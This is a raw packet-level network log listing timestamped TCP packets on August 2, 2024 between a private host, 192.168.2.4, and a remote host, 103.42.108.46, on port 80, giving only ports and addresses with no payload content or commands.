Aug 2, 2024 13:43:10.468638897 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.468641043 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.468656063 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.468667984 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.468771935 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.469383955 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.469408035 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.469420910 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.469436884 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.469522953 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.469537973 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.469544888 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.469558954 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.469585896 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.469666958 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.470244884 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.470293045 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.470305920 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.470635891 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.470824003 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.556761980 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.556845903 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.556875944 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.557128906 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.599281073 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.686108112 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.686147928 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.686167955 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.686182976 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.686194897 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.686346054 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.686530113 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.686603069 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.686616898 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.686657906 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.686670065 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.686685085 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.686685085 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.686717987 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.686870098 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.686908007 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.686954021 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.686966896 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.686969042 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.687004089 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.687016964 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.687016964 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.687130928 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.687143087 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.687155008 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.687166929 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.687181950 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.687196970 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.687258959 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.687263012 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.687275887 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.687308073 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.687321901 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.687347889 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.687397957 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.687412977 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.687791109 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.687822104 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.687834024 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.687879086 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.687880039 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.687896013 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.687911987 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.687917948 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.687936068 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.687968016 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.687998056 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.688071012 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.688083887 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.688095093 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.688107014 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.688119888 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.688124895 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.688169003 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.688169003 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.688204050 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.688287973 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.688299894 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.688309908 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.688323021 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.688334942 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.688350916 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.688426971 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.688452959 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.688466072 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.688476086 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.688509941 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.688540936 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.688596010 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.688607931 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.688618898 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.688648939 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.688663006 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.688731909 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.688743114 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.688754082 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.688774109 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.688786030 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.688796997 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.688808918 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.688822031 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.688826084 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.688853979 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.688894033 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.689068079 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.689086914 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.689097881 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.689110041 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.689124107 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.689135075 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.689150095 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.689152002 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.689163923 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.689176083 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.689181089 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.689181089 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.689235926 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.689291000 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.689363956 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.689376116 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.689423084 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.689446926 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.689459085 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.689470053 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.689482927 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.689512968 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.689567089 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.689677000 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.689690113 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.689697027 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.689702034 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.689707994 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.689847946 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.691293955 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.691328049 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.691340923 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.691354990 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.691569090 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.697120905 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.777635098 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.777709961 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.777757883 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.777771950 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.777808905 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.777842999 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.777889967 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.777899027 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.777935028 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.777951002 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.777987957 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.778023005 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.778053999 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.778055906 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.778090954 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.778114080 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.778167963 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.778203011 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.778208017 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.778237104 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.778274059 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.778290033 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.832374096 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.907321930 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.907464981 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.907520056 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.907520056 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.907557964 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.907610893 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.907617092 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.907668114 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.907715082 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.907721043 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.907756090 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.907789946 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.907798052 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.907841921 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.907896996 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.907931089 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.907953978 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.907963991 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.907980919 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.908006907 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.908060074 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.908094883 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.908097982 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.908129930 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.908140898 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.908185005 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.908221960 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.908237934 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.908257961 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.908302069 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.908303022 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.908339024 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.908371925 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.908381939 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.908406019 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.908454895 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.908458948 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.908519983 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.908552885 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.908571959 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.908588886 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.908634901 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.908646107 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.908684969 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.908723116 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.908731937 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.908776045 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.908819914 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.908828974 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.908862114 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.908896923 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.908914089 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.908931971 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.908965111 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.908976078 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.908999920 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.909034014 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.909043074 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.909069061 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.909102917 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.909135103 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.909136057 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.909168959 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.909177065 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.909220934 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.909260035 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.909265041 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.909297943 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.909332991 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.909344912 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.909365892 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.909401894 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.909414053 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.909435987 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.909470081 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.909499884 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.909502029 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.909535885 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.909548044 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.909569979 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.909606934 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.909621000 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.909642935 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.909677029 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.909710884 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.909710884 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.909745932 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.909759998 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.909782887 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.909816027 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.909837961 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.909849882 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.909945965 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.909960032 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.909979105 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.910012960 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.910026073 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.910047054 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.910085917 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.910090923 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.910115957 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.910166025 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.910170078 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.910207033 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.910239935 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.910264015 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.910274029 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.910310030 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.910321951 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.910345078 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.910377979 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.910389900 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.910418987 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.910454988 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.910500050 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.910506964 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.910541058 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.910561085 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.910574913 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.910609007 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.910614014 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.910644054 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.910672903 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.910706043 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.910707951 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.910739899 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.910752058 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.910774946 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.910808086 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.910825014 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.910841942 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.910876036 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.910882950 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.910911083 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.910944939 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.910957098 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.910979986 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.911015987 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.911020041 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.911050081 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.911084890 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.911098003 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.911118031 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.911151886 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.911155939 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.911185980 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.911218882 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.911221981 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.911252975 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.911287069 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.911298037 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.911323071 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.911356926 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.911391973 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.911391973 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.911427021 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.911437035 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.911459923 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.911494017 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.911525965 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.911537886 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.911561012 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.911587000 CEST	49761	80	192.168.2.4	103.42.108.46
Aug 2, 2024 13:43:10.911596060 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.911629915 CEST	80	49761	103.42.108.46	192.168.2.4
Aug 2, 2024 13:43:10.911643982 CEST	49761	80	192.168.2.4	103.42.108.46
